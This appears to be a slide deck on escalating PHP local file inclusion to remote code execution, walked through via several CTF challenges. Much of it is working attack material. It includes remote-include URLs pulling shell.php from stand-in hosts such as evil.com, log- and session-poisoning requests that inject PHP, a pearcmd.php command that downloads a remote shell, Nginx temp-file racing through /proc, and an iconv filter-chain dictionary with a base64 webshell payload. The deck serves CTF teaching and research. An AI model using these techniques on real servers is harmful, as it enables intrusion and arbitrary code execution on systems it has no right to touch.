## One Line PHP
# 從入門到入土
#### One Line PHP: From Genesis to Ragnarök
#### - Ginoah, Bookgin
## PHP include
#### [PHP: include - Manual](https://www.php.net/manual/en/function.include.php)
The include expression includes and
**evaluates** the specified file.
#### i.e.
- include
- include_once
- require
- require_once
### Scenario
#### 🌰
├── index.php
├── home.php
└── account.php
<?php //index.php
<?php //home.php
print("home page");
#### 🌰 (cont'd)
home page
## LFI
Local file inclusion
### Scenario
#### Normal Usage
#### Read local file
#### How to read php src / execute php code
PHP doesn't care about file name
PHP looks for `open tag` in file, such as
- `<?php`
- `<?=`
- `<?` // (short_open_tag=on)
- `<%` // (asp_tags=on)
- ...
#### PHP support a lot of protocols and wrappers
#### PHP Supported Protocols and Wrappers
- file:// — Accessing local filesystem
- http:// — Accessing HTTP(s) URLs
- ftp:// — Accessing FTP(s) URLs
- php:// — Accessing various I/O streams
- zlib:// — Compression Streams
- data:// — Data (RFC 2397)
- glob:// — Find pathnames matching pattern
- phar:// — PHP Archive
- ...
#### PHP I/O stream wrapper [php://](https://www.php.net/manual/en/wrappers.php.php)
- `php://stdin`, `php://stdout` ..
- `php://input`, `php://output`
- `php://fd`
- `php://memory`, `php://temp`
- `php://filter`
#### PHP filter `php://filter`
- String Filters
- string.rot13
- string.toupper
- ..
- Conversion Filters
- convert.base64-encode
- convert.iconv.*
- ..
- Compression Filters
- ..
- ..
#### `php://filter` to Read PHP src code
## From LFI to RCE
From local file inclusion
to remote code execution (RCE)
## Include user-controlled data
If we luckily find a file with `<?php phpinfo(); ?>`, we can achieve RCE!
## Question
Is there a file containing user-controlled data?
Or ... can we create one on our own?
## LFI to RCE
- **Remote include**
- Log-related files
- PHP temp files
## Remote include
// default is Off :(
allow_url_include = On
- `/?page=http://evil.tw/shell.php`
- `/?page=ftp://evil-ftp.tw/shell.php`
- `/?page=data://text/plain,<?php phpinfo();?>`
## LFI to RCE
- Remote include
- **Log-related files**
- PHP temp files
## Environment variables
- `/proc/self/environ`
If you are still in 2000 where cgi-bin is popular:
GET /?page=../../../../proc/self/environ HTTP/1.1
User-Agent: <?php phpinfo();?>
## Environment variables (cont'd)
because cgi-bin uses env to pass arguments:
USER_AGENT=<?php phpinfo();?>
## Webserver log files
- `/var/log/apache2/access.log`
- `/var/log/apache2/error.log`
GET /?page=../../../../var/log/apache2/access.log HTTP/1.1
User-Agent: <?php phpinfo();?>
## Webserver log files (cont'd)
The log files will contain
``` - - [12/Jan/2022:20:42:23 +0800] "GET / HTTP/1.1" 400 484 "-" "curl/7.68.0" - - [12/Jan/2022:20:42:50 +0800] "GET / HTTP/1.1" 400 484 "-" "<?php phpinfo(); ?>"
## ssh log files
- `/var/log/auth.log`
ssh '<?php phpinfo(); ?>'@example.com
## ssh log files (cont'd)
The log file will contain
Jan 12 12:31:40 example sshd[724613]: Invalid user <?php phpinfo(); ?> from port 31776
Jan 12 12:31:40 example sshd[724613]: Connection closed by invalid user <?php phpinfo(); ?> port 31776 [preauth]
## LFI to RCE
- Remote include
- Log-related files
- **PHP temp files**
## PHP session files
If one of the `$_SESSION` value can be controlled:
$_SESSION["username"] = $_GET["username"];
## PHP session files (cont'd)
- `/tmp/sess_<session_id>`
username|s:6:"<?php phpinfo(); ?>";
`<session_id>` can be set to a user-controlled value from the request cookie
Cookie: PHPSESSID=foobar
// create a file `/tmp/sess_foobar`
## PHP POST upload
If we send POST with a large file...

## PHP POST upload (cont'd)
PHP will create a temp file `/tmp/phpAz7M6x` identical to our uploaded file.
Filename: `php[a-zA-Z0-9]{6}`
## PHP POST upload (cont'd)
Since we need to guess the `/tmp/php??????` filename, we still need one following conditions:
1. List `/tmp/`
2. View the output of `phpinfo()` (tmp_name)
3. The server is [Windows](http://www.madchat.fr/coding/php/secu/onsec.whitepaper-02.eng.pdf)
## PHP POST temp file on Windows
Brute-force 65536 or...
`<` is a wildcard `*` on Windows!
## Conclusion
With the default config of Windows PHP, fully LFI is equal to RCE.
## One Line PHP
**One Line PHP Challenge - orange_tw**
## One Line PHP (cont'd)
($_=@$_GET['orange']) && @substr(file($_)[0],0,6)
=== '@<?php' ? include($_) : highlight_file(__FILE__);
1. LFI
2. The file must start with `@<?php`
3. No session, ssh, log and env
## Revisit our exploits
- environment variables: it's not cgi-bin
- webserver log: no permission to read
- ssh log: ssh is not exposed
- php \$_SESSION: no such thing
- POST upload: no phpinfo
## Session Upload Progress
If `PHP_SESSION_UPLOAD_PROGRESS` in POST data, PHP will enable the session.
[Session Upload Progress](https://www.php.net/manual/en/session.upload-progress.php) by default is enabled.
## Session Upload Progress (cont'd)
- `/var/lib/php/session/upload_progress_<session_id>`
## The last piece of the puzzle
The file must start with `@<?php`.
How to turn this into the desired string?
## Base64 to the rescue
[By default](https://www.php.net/manual/en/function.base64-decode.php), invalid characters will be silently discarded.
php > var_dump(base64_decode("<(^_^)>Rk9PQkFSC"));
string(6) "FOOBAR"
## base64 chains
php > var_dump(base64_decode("FOO_"."ZUms5UFFrRlND"));
string(12) "�Rk9PQkFSC"
php > var_dump(base64_decode(base64_decode("FOO_"."ZUms5UFFrRlND")));
string(6) "FOOBAR"
## Final exploit
data = {
b64(b64(b64("@<?php phpinfo(); >")))
files={'f': open('large.txt').read()},
Racing the file and include it to RCE!
## Conclusion
With the default config of Linux PHP, fully LFI is equal to RCE.
## One Line PHP Revenge
RealWorld CTF 2018
**The Return of One Line PHP Challenge <br> - wupco1996**
## One Line PHP Revenge (cont'd)
Source code and config are exactly the same as One Line PHP challenge, but ...
session.upload_progress.enabled = false
## Revisit our exploits
- environment variables: it's not cgi-bin
- webserver log: no permission to read
- ssh log: ssh is not exposed
- php \$_SESSION: no such thing
- POST upload: no phpinfo
- upload session: disabled
## POST upload
`/tmp/php[a-zA-Z0-9]{6}` and limited time window

## POST upload (cont'd)
PHP 7.2 bug leads to segmenetaion fault
and the `/tmp/php??????` won't be deleted
## Final exploit
1. POST 62**3 `/tmp/php??????` files
2. Try ro include 62**3 `/tmp/php000000`
3. RCE
## Conclusion
With the default config of Linux PHP 7.2, even if the session upload is disabled, fully LFI is equal to RCE.
## 1linephp
0CTF/TCTF 2021
**One line PHP Challenge with `.php` - yxxx**
## 1linephp (cont'd)
($_=@$_GET['yxxx'].'.php') && @substr(file($_)[0],0,6) === '@<?php' ? include($_) : highlight_file(__FILE__) && include('phpinfo.html');
## 1linephp (cont'd)
if(substr(file($filename)[0],0,6) === '@<?php')
1. `session.upload_progress = On`
2. The filename end with `.php`
3. The file must start with `@<?php`
4. `Zip` extension enabled
The extention tragedy
Can we use
Cookie: PHPSESSID=blahblah.php
to create `/tmp/sess_blahblah.php` ?
PHP doesn't allow `.` in Session name
Cookie: PHPSESSID=blahblah.php
~~to create `/tmp/sess_blahblah.php`~~
$_GET[yxxx] .`'.php'`
- Http
- `http://evil.com/shell.php#.php`
- Phar
- `phar:///tmp/sess_blahblah/shell.php`
- Zip
- `zip:///tmp/sess_blahblah#shell.php`
$_GET[yxxx] .`'.php'`
- ~~Http~~
- allow_url_include = 0
- Phar
- `phar:///tmp/sess_blahblah/shell.php`
- Zip
- `zip:///tmp/sess_blahblah#shell.php`
$_GET[yxxx] .`'.php'`
- ~~Http~~
- allow_url_include = 0
- ~~Phar~~
- Phar require extention (any extention)
- Zip
- `zip:///tmp/sess_blahblah#shell.php`
$_GET[yxxx] .`'.php'`
But `/tmp/sess_blahblah` is not a zip file
Cookie: PHPSESSID=blahblah
#### Zip format
<img src="https://raw.githubusercontent.com/w181496/CTF/master/0ctf2021_qual/1linephp/zip_struct.png" style="height:500px">
###### Ref: Kaibro
#### Make `sess_blahblah` a zip file
<img src="https://raw.githubusercontent.com/w181496/CTF/master/0ctf2021_qual/1linephp/zip-sol.png" style="height:500px">
###### Ref: Kaibro
### Race it!
## Conclusion
With `zip` enabled, we can use zip wrapper to bypass extention restriction. partial LFI with `.php` is still equal to RCE.
## 2linephp
Balsn CTF 2021
**One line PHP Challenge with `.php` & without Zip - Kaibro**
## 2linephp (cont'd)
($_=@implode($_GET)) && (stripos($_,"zip") !== FALSE || stripos($_,"p:") || stripos($_,"s:")) && die("Bad hacker!");
($_=@$_GET['kaibro'].'.php') && @substr(file($_)[0],0,5) === '<?php' ? include($_) : highlight_file(__FILE__) && include('phpinfo.php');
## 2linephp (cont'd)
//... some WAF
if(substr(file($filename)[0],0,5) === '<?php')
1. `session.upload_progress = On`
2. The filename end with `.php`
3. `Zip` extension disabled
4. The file must start with `<?php`
5. Use PHP officail docker image
What about existing PHP file?
$ find / -name '*.php'
#### pearcmd.php
- PHP Extension and Application Repository
- /usr/local/lib/php/pearcmd.php
- **Default installed** in PHP official docker image
- Cmd line tool to install PHP package
Since `pearcmd.php` is a Cmd line tool,
It use `$_SERVER['argv']` as argument
$_SERVER['argv'] = explode('+', $_SERVER[‘QUERY_STRING’])
when `register_argc_argv = On`
#### Cmd line
$ php pearcmd.php install -R /tmp http://evil.com/shell.php
#### Web
/?+install+-R+/tmp http://evil.com/shell.php?&kaibro=/usr/local/lib/php/pearcmd
#### Cmd line
$ php pearcmd.php config-create /'<?=phpinfo()>' /tmp/info.php
#### Web
#### But there's some WAF
1. `p:`, `s:` are blocked
- disallow `http:`, `https:`
3. The file must start with `<?php`
- `config-create` have garbage prefix
#### Cmd line
$ php pearcmd.php channel-discover kaibro.tw/302.php
#### Web
- `302.php` redirect to http://kaibro.tw/test.php
- `/tmp/pear/temp/test.php`
## Conclusion
With PHP official docker image, there's a useful b4ckd0or - `pearcmd.php`, partial LFI with `.php` is equal to RCE.
## includer's revenge
hxp CTF 2021
**One line PHP Challenge with Nginx - 0xbb**
#### includer's revenge
<?php include($_GET['file']);
#### includer's revenge
<?php include($_GET['file']);
1. `file_uploads = Off`
2. `session.upload_progress = Off`
3. chmod -R 000 /tmp /var/tmp /var/lib/php/sessions
4. `PHP-FPM` and `Nginx` is on the same host
5. `PHP-FPM` and `Nginx` both run with `www-data`
#### Find `www-data` writable file
#### `/var/lib/nginx/body`
When request body is big enough, `Nginx` will create a temp file to [buffer client body](https://nginx.org/en/docs/http/ngx_http_core_module.html#client_body_buffer_size)
#### `/var/lib/nginx/body` (cont'd)
But `Nginx` unlike the temp file immediately
ngx_open_tempfile(u_char *name, ngx_uint_t persistent, ngx_uint_t access)
ngx_fd_t fd;
fd = open((const char *) name, O_CREAT|O_EXCL|O_RDWR,
access ? access : 0600);
if (fd != -1 && !persistent) {
(void) unlink((const char *) name);
return fd;
#### procfs
Since the file was unlink without closing,
we can still read the file through `fd` under `/proc`
total 0
lrwx------ 1 www-data www-data 64 0 -> /dev/pts/0
lrwx------ 1 www-data www-data 64 1 -> /dev/pts/0
lrwx------ 1 www-data www-data 64 10 -> anon_inode:[eventfd]
lrwx------ 1 www-data www-data 64 11 -> socket:[27587]
lrwx------ 1 www-data www-data 64 15-> /var/lib/nginx/body/0000001368 (deleted)
#### So..
#### Nope
if `php_sys_lstat()` findout the file was deleted, it won't include the file.
#### Soft link loop
#### `Nginx`'s pid & fd
1. `/proc/<1-1000>/cmdline` to find pid
2. Brute force fd
#### Exploit
1. Find out `Nginx`'s pid
2. Keep sending huge body containing webshell to create temp file
3. Race the temp file with
## Conclusion
When `Nginx` and `PHP` is on the same host with same user, even if `file_uploads = Off` & `session.upload_progress = Off`, fully LFI is equal to RCE.
## 卍解
**PHP include webshell `without` tmp file - loknop**
<img src='https://i.imgur.com/XPNUJz0.png' style="height: 600px">
Prepend `\x1b$)C` to any stream
Base64 decode and ignore any non base64 char
e.g. `/etc/passwd`
`convert.base64-encode` encode `/etc/passwd`
base64 decode
We prepend `base64decode('C')` to the stream!
Web Shell
base64_payload = "PD89YCRfR0VUWzBdYDs7Pz4"
Fuzz the char we need
'R': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2',
'B': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2',
'C': 'convert.iconv.UTF8.CSISO2022KR',
'8': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2',
'9': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB',
'f': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.SHIFTJISX0213',
's': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61',
'z': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS',
'U': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932',
'P': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213',
'V': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5',
'0': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2',
'Y': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2',
'W': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.851.UTF8|convert.iconv.L7.UCS2',
'd': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2',
'D': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2',
'7': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2',
'4': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2'
## **TH3 Bl4ck M4g1c**
`/etc/passwd` become
### Char Dictionary
### Char Dictionary (cont'd)
'0': 'convert.iconv.CP1162.UTF32|convert.iconv.L4.T.61|convert.iconv.ISO6937.EUC-JP-MS|convert.iconv.EUCKR.UCS-4LE'
'1': 'convert.iconv.ISO88597.UTF16|convert.iconv.RK1048.UCS-4LE|convert.iconv.UTF32.CP1167|convert.iconv.CP9066.CSUCS4'
'9': 'convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB'
'a': 'convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE'
'z': 'convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937'
'A': 'convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213'
'Z': 'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16'
'/': 'convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4'
### Now we can prepend anything to anyfile
Add `3nd @f 1linephp QQ` to `/etc/password`
3nd @f 1linephp QQroot:x:0:0:root:/root:/usr/bin/bash
## Conclution
**LFI is equal to RCE.**
# End

## Feedback
<img src="https://i.imgur.com/FVKuKRn.png" style="height:400px">
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font-size: 90%;
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